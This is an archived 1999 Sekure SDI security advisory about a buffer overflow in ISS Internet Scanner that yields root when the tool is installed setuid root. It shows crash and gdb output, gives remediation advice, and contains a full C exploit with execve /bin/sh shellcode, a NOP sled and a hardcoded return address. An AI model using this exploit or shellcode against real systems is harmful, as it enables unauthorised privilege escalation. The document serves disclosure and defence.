TUCoPS :: Unix :: General :: sdi_03~1.txt

Internet Scanner Buffer Overflow
 



			          Sekure SDI
            	             http://www.sekure.org
                          ---------------------------
                       Brazilian Information Security Team


           	      -> Internet Scanner Buffer Overflow <-
                             (SDI.03-99.iss-scanner)

---
complexity      : medium
critical level  : medium
---

 1. Introduction 

   Internet Scanner (I.S) is a wide known tool to audit the security level
of a certain network. It has a database which will assist in the detection of  
the commom security holes that may help an intruder to gain access or
gather private information from the scanned host.

   During the checks, I.S. will run a set of procedures that requires
privileges in the local host (root), so an ordinary user may not start a
scan. 

   Altough it's not the default configuration, it's commom, in certain
cases, to set the suid bit to permit "root privileges" so the "audit" user, 
who does not have the necessary privileges, may execute a scan.

   A certain problem was found in the IS program during some tests in
our lab. While by default it will not represent a thread, in the above
situation (suid bit owned by root), it will become a security gap.


 2. I.S Flaw

   Internet Scan does not check bounds in some arguments it receives from
the command line, which will cause a segmentation fault.
 
     sekure:~$ ./iss -D `perl -e "print 'A' x 2000"`
     Creating Directory /usr/local/iss/scans/s.199903241212
     # Time Stamp(2103): Signal - Segmentation Violation: (...)
     (..)
     ISS Scan was interrupted.
     Segmentation fault

     sekure:~$ ./iss -c `perl -e "print 'A' x 2000"`
     (...)
     Segmentation fault

   Let's check the return address:

     (gdb) run -D `perl -e "print 'A' x 2000"`
     Starting program: iss -D `perl -e "print 'A' x 2000"`
     (...)
     Program received signal SIGSEGV, Segmentation fault.
     0x41414141 in ?? ()
     (gdb)
 
   In this situation, we can reach the return address (which holds the
place the program must return in the memory), so we may execute arbitrary
commands, and adding the "suid bit" situation, it will be executed with root 
privileges.


  3. Who is vulnerable ?
 
  If you are running I.S using the SETUID bit to conceed root privileges
to an ordinary user, then you ARE vulnerable to this attack.
  
  If you are using the DEFAULT configuration of I.S, you are NOT
vulnerable.

 
  4. Fixing the situation

  The ISS which is the owner of I.S does not provide the source code along
with the program, so we may not provide a quick patch. 

  We advice you to remove the suid bit and contact the vendor for a
correction.

  We also advice you to avoid the use of suid bit unless you are familiar
with the purpose of the program.
  
  
  5. Exploiting the bug

  We believe information must be free available. If we don't provide the
exploit script along with the information, someone else will do. 

  We also know that people like to see with their own eyes to believe
they are vulnerable. So here it is:

------------- SDI-iss.c -----------------------------
/* 
 *  Sekure SDI - http://www.sekure.org  
 *  Brazilian Information Security Team  
 *  By c0nd0r <condor@sekure.org>
 *
 *  . ..Internet Scanner (ISS) Buffer Overflow.. .  
 *  (read the original advisory at http://www.sekure.org/advisory.html)
 *    
 *  > This may not represent a thread if you are
 *  > NOT using IS with setuid root
 *
 *  This code is only for educational purposes.
 *  ------------------------------
 *  Instructions: After the compilation, execute it to get 
 *  a shell prompt with the $EGG in the environment.
 *  tiazinha:~$ SDI-iss
 *  bash$ ls -tarl iss
 *  -rwsr-xr-x   1 root     daemon    1691180 Dec 10 15:22 iss*
 *  bash$ ./iss -c $EGG   
 *  
 *  Creating Directory /usr/local/iss/scans/s.199903261158
 *  id;
 *  uid=666(condor) gid=100(deejay) euid=0(root) groups=12(mail)
 *  -------------------------------
 *  PS: the i/o descriptors are used by IS (stdin/stdout) as this is 
 *  just an example, I'll not worry about. 
 */

char shellcode[]=
 	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	"\x80\xe8\xdc\xff\xff\xff/bin/sh";

#define ISS_HOME "/usr/local/iss"

main ( int argc, char *argv[]) {
  char buff[2048], env[250];
  long addr;
  int x, y, offset=0, src;

  if (argc > 1) offset = atoi(argv[1]);

  for ( x = 0; x < (238-strlen(shellcode)); x++) 
    buff[x] = 0x90;

  for ( y = 0; y < strlen(shellcode); y++, x++)
    buff[x] = shellcode[y];

  addr = (long) &src + offset;
  printf ( "SDI I.S. Exploit Code\n");
  printf ( "4 educational purpose only\n");
  printf ( "Please, go to ISS directory and run:\n");
  printf ( "./iss -c $EGG\n\n");

  /* the program mess with the stack so I prefer to set it 
     by my own hands, no prob, just a little bit different */
  
  buff [x++] = 0x60; 
  buff [x++] = 0xef; 
  buff [x++] = 0xff; 
  buff [x++] = 0xbf; 
  /* it works fine in my slak3.5 box */

  buff[strlen(buff)] = '\0';

  snprintf ( env, sizeof(env), "ISS_HOME=%s", ISS_HOME); 
  putenv ( env);
  bzero ( &env, sizeof(env));

  snprintf ( env, sizeof(env), "EGG=%s", buff);
  putenv ( env);
  system ( "/bin/sh");

}
--------------------- eof ------------------

  6. Contacts

  Sekure SDI
  http://www.sekure.org
  info@sekure.org

  This advisory has been written by SSC (Sekure SDI Secure Coding Group)
  http://ssc.sekure.org
  securecode@sekure.org

  Subscribe the Best of Security Brazil - mailing list
  http://bos.sekure.org
  bos-br-request@sekure.org
  (the main language is portuguese but everybody is welcome)


----
written by c0nd0r
condor@sekure.org


-condor
www.sekure.org
 s e k u r e  

pgp key available at: http://condor.sekure.org/condor.asc

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH